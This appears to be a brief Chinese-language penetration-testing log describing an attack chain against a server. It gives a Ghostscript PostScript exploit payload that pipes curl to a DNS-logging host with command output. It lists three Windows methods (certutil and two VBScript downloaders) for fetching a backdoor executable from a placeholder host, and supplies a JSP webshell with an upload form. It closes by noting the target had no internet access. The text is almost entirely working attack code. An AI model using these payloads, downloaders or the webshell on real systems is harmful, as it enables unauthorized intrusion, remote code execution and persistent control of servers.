首先是魔图漏洞
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%curl http://dnslog.cn/`whomai`)
currentdevice putdeviceprops
然后windows下载后门。
方法1:certutil.exe -urlcache -split -f http://xxx/x.exe
方法2:
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs
cscript downfile.vbs http://xxx/x.exe D:\\1.exe
方法3:
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://xxx/x.exe",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "D:/a.exe",2 >>download.vbs
下载失败
通过echo写入jsp webshell
记得要urlencode编码一次
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
<form method=post action="http://xxx/1.jsp">
<br><br>
<textarea name="t" rows=20 cols=120>你要提交到服务器的代码</textarea>
<br>
要保存成的文件名:<input name="f" size=30 value=shell.jsp>
<input type="submit" value=提交>
</form>
结局很经典
纯内网没有外网权限。我傻了。